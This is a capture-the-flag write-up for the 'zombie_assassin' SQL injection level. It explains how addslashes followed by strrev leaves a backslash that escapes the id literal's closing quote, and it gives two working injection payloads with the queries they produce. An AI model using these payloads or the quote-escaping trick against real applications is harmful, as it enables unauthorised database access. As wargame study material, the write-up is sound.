
This is challenge 17, "zombie_assassin".

 

$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));

The variables that receive user input are "id" and "pw".

addslashes puts a backslash in front of every single quote ('), double quote ("), backslash (\) and NUL byte in the input so that they are treated as plain string content (a NUL byte actually becomes the two characters \0), and strrev then reverses the whole input string.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

Both variables are also checked with preg_match for prob, _, . and (), which makes this harder to approach. Note that the check runs after addslashes and strrev, so it is the reversed value that has to get past the filter.

 

$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
if($result['id']) solve("zombie_assassin"); 

To solve this challenge we only have to produce a query that executes and returns a row, so we don't need any particular account; any row will do.

 

As in the succubus challenge, it seems like we could bypass the quotes by having everything from the id value through the opening quote of pw treated as a single string and then append an always-true condition, but because of addslashes a \ becomes \\, so that fails.

 

While looking for another way, I figured that strrev, which reverses the string, could be used to get an arbitrary part of the query treated as a string.

 

For example, sending a single quote gives id='\'' and pw='' after addslashes and id=''\' and pw='' after strrev. Here the two quotes '' close the id literal right away and leave a stray backslash outside any string, so a single quote by itself does not get us anywhere.

 

If instead we send %00 (NUL) or a double quote ("), addslashes produces \0 or \", and after strrev the value starts with 0\ or "\:
id='\"' and pw='' -> id='"\' and pw='or 1=1#'
Now the backslash sits right in front of the quote that was supposed to close the id literal, so MySQL treats that quote as escaped and the literal runs from id=' all the way to the opening quote of pw=' (the part highlighted in the original). Whatever we put in pw after that, here the reversed or 1=1#, is parsed as SQL, so the always-true condition executes and the # comments out the trailing quote.

 

Exploit Code

IN (GET parameters) -> ?id=%00&pw=%23eurt ro

OUT (query) -> select id from prob_zombie_assassin where id='0\' and pw='or true#'

 

IN (GET parameters) -> ?id="&pw=%231=1 ro

OUT (query) -> select id from prob_zombie_assassin where id='"\' and pw='or 1=1#'

In both cases the backslash escapes the quote that should have closed the id literal, the opening quote of pw closes it instead, the reversed pw value is parsed as SQL, and # comments out the final quote.
